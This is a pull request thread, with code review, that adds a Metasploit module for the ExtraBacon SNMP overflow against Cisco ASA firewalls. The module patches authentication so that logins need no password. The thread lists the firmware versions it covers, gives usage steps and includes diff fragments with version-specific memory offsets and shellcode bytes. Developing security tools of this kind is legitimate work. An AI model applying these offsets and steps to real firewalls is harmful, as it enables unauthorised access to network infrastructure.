### PR TITLE
Added module auxiliary/admin/cisco/cisco_asa_extrabacon

### PR DESCRIPTION
**Pull request by ghost**
We've added a module for ExtraBacon. We are adding patches for most versions of 8.x and 9.x in the near future after we test all versions on real hardware.

This is using improved shellcode, has less stages than the Equation Group version making it more reliable. This makes the SNMP payload packet ~150 less bytes. Also, the leaked version only supports 8.x, we have it working on 9.x versions.

If anyone wants to help test more version specific offsets, we have a Lina file offset finder at:

https://github.com/RiskSense-Ops/CVE-2016-6366
## Supported Versions (will update list as we go):

All of the leaked versions are now in the module.

8.x
- 8.0(2)
- 8.0(3)
- 8.0(3)6
- 8.0(4)
- 8.0(4)32
- 8.0(5)
- 8.2(1)
- 8.2(2)
- 8.2(3)
- 8.2(4)
- 8.2(5)
- 8.2(5)33 `*`
- 8.2(5)41 `*`
- 8.3(1)
- 8.3(2)
- 8.3(2)39 `*`
- 8.3(2)40 `*`
- 8.3(2)-npe `*` `**`
- 8.4(1)
- 8.4(2)
- 8.4(3)
- 8.4(4)
- 8.4(4)1 `*`
- 8.4(4)3 `*`
- 8.4(4)5 `*`
- 8.4(4)9 `*`
- 8.4(6)5 `*`
- 8.4(7) `*`

9.x
- 9.0(1) `*`
- 9.1(1)4 `*`
- 9.2(1) `*`
- 9.2(2)8 `*`
- 9.2(3) `*`
- 9.2(4) `*`
- 9.2(4)13 `*`

`*` new version support not part of the original Shadow Brokers leak
`**` We currently can't distinguish between normal and NPE versions from the SNMP strings. We've commented out the NPE offsets, as NPE is very rare (it is for exporting to places where encryption is crappy), but in the future, we'd like to incorporate these versions. Perhaps as a bool option?
## Verification

List the steps needed to make sure this thing works
- [x] Start `msfconsole`
- [x] `use auxiliary/admin/cisco/cisco_asa_extrabacon`
- [x] `set RHOST x.x.x.x`
- [x] `check`
- [x] `run`
- [x] ssh admin@x.x.x.x, you will not need a valid password
- [x] `set MODE pass-enable`
- [x] `run`
- [x] ssh admin@x.x.x.x, ensure fake password does not work 

This module patches the authentication functions of a Cisco ASA
to allow uncredentialed logins. Uses improved shellcode for payload.

### CODE REVIEW

File: modules/auxiliary/admin/cisco/cisco_asa_extrabacon.rb [hunk 1]
```diff
@@ -0,0 +1,176 @@
...
+      "9.0(1)" => ["221.227.27.8", "134.13.3.9", "72", "0.176.126.9", "112.182.126.9", "85.49.192.137", "0.32.8.8", "240.45.8.8", "85.137.229.87"],
+      "8.4(7)" => ["109.22.18.8", "70.254.226.8", "72", "0.144.87.9", "80.156.87.9", "85.49.192.137", "0.32.8.8", "0.34.8.8", "85.137.229.87"],
+      "8.4(3)" => ["13.178.7.8", "150.219.224.8", "72", "0.192.84.9", "208.207.84.9", "85.49.192.137", "0.16.8.8", "208.23.8.8", "85.137.229.87"],
+      "8.3(1)" => ["111.187.14.8", "140.140.194.8", "88", "0.112.53.9", "240.119.53.9", "85.49.192.137", "0.208.6.8", "48.221.6.8", "85.137.229.87"],
+      "8.2(3)" => ["45.0.7.8", "252.42.185.8", "88", "0.96.43.9", "128.111.43.9", "85.49.192.137", "0.240.6.8", "144.241.6.8", "85.137.229.87"]
+    }
+
+  end
+
+  def setup
```
Comment (busterb) [inline modules/auxiliary/admin/cisco/cisco_asa_extrabacon.rb]: do these need to exist?

File: modules/auxiliary/admin/cisco/cisco_asa_extrabacon.rb [hunk 2]
```diff
@@ -0,0 +1,176 @@
...
+    if @offsets[vers_string]
+      print_status("Payload for Cisco ASA version #{vers_string} available")
+      return Exploit::CheckCode::Appears
+    end
+
+    print_warning("Received Cisco ASA version #{vers_string}, but no payload available")
+    return Exploit::CheckCode::Detected
+  end
+
+  def build_offsets(vers_string, mode)
```
Comment (busterb) [inline modules/auxiliary/admin/cisco/cisco_asa_extrabacon.rb]: looks like you're switching between 2 and 4 character indents through the module

File: modules/auxiliary/admin/cisco/cisco_asa_extrabacon.rb [hunk 3]
```diff
@@ -0,0 +1,176 @@
...
+      finder_snmp = "139.124.36.20.139.7.255.224.144"
+
+      overflow = [head, wrapper, @offsets[vers_string][0], finder_snmp].join(".")
+      return overflow
+  end
+
+  def run()
+
+    begin
+      mode = datastore['MODE']
```
Comment (busterb) [inline modules/auxiliary/admin/cisco/cisco_asa_extrabacon.rb]: this is a bit more readable if it's collapsed more IMO

File: modules/auxiliary/admin/cisco/cisco_asa_extrabacon.rb [hunk 4]
```diff
@@ -0,0 +1,176 @@
...
+
+      if response.varbind_list
+        print_good("Clean return detected!")
+        if mode == 'pass-disable'
+          print_warning("Don't forget to run pass-enable after logging in!")
+        end
+      end
+
+    rescue ::Rex::ConnectionError, ::SNMP::RequestTimeout, ::SNMP::UnsupportedVersion
+      print_error("SNMP Error, Cisco ASA may have crashed :/")
```
Comment (busterb) [inline modules/auxiliary/admin/cisco/cisco_asa_extrabacon.rb]: I'm not sure if UnsupportedVersion would really indicate a crash on the ASA

**Comment by bcook-r7** [comment]
Awesome work simplifying the shell code and improving reliability. Did you happen to see the exploit module in the queue from a couple of weeks ago as well? I'd like to see how we can merge these a bit so they share where they can and we end up with the best attribute of both.

**Comment by zerosum0x0** [comment]
@bcook-r7 egyp7 told us to get in contact with William Webb, I tried contacting him on Twitter about a week ago to collaborate but he hasn't been active there. I honestly didn't even see his pull request until after we submitted this one. It seems his version is a straightforward port of the original code from Python to Ruby.

But I think once we support all the original versions (hopefully today) with the improved shellcode, Metasploit shouldn't use the original code at all. I've crashed 8.2(3) in the lab running the original shellcode when it failed to properly find the third stage. This new shellcode does everything in the second stage. I have a blog post detailing why the original shellcode was so large/verbose, and easy to reduce in size: http://zerosum0x0.blogspot.com/2016/09/reverse-engineering-cisco-asa-for.html

Also, going from the second to third stage to support 9.x versions also requires fiddling with a stack offset to a pointer I'm still unsure of how to calculate. I stopped trying to figure out because it was unnecessary.

I am open to any way you see fit to merge the two. I hope William will help us test new versions using the offset finder script as well.

File: modules/auxiliary/admin/cisco/cisco_asa_extrabacon.rb (hunk 1 above)
Comment (zerosum0x0) [inline modules/auxiliary/admin/cisco/cisco_asa_extrabacon.rb]: Removed these

File: modules/auxiliary/admin/cisco/cisco_asa_extrabacon.rb (hunk 2 above)
Comment (zerosum0x0) [inline modules/auxiliary/admin/cisco/cisco_asa_extrabacon.rb]: Fixed this up

File: modules/auxiliary/admin/cisco/cisco_asa_extrabacon.rb (hunk 3 above)
Comment (zerosum0x0) [inline modules/auxiliary/admin/cisco/cisco_asa_extrabacon.rb]: Fixed

File: modules/auxiliary/admin/cisco/cisco_asa_extrabacon.rb (hunk 4 above)
Comment (zerosum0x0) [inline modules/auxiliary/admin/cisco/cisco_asa_extrabacon.rb]: Made the exception handling better

**Comment by bcook-r7** [comment]
Thanks @zerosum0x0. Yeah, it's a bummer to have competing modules, but I see what you mean on reliability after doing some comparison testing as well.

**Comment by bcook-r7** [comment]
I don't have any more complaints here, this looks good. I'm going to give @wwebb-r7 some credit here though as well.

**Comment by bcook-r7** [comment]
A couple of nits before we continue. First, I'm sending you a PR with some docs. Second, can I request that you move all of this to a feature branch, and re-PR from there? When you send a PR from your local master branch, and then you later update your master branch, it breaks all of the history in this PR in github.

**Comment by zerosum0x0** [comment]
Created #7359 which merges @bcook-r7 pull request and as requested is in a feature branch

**Pull request closed without merging**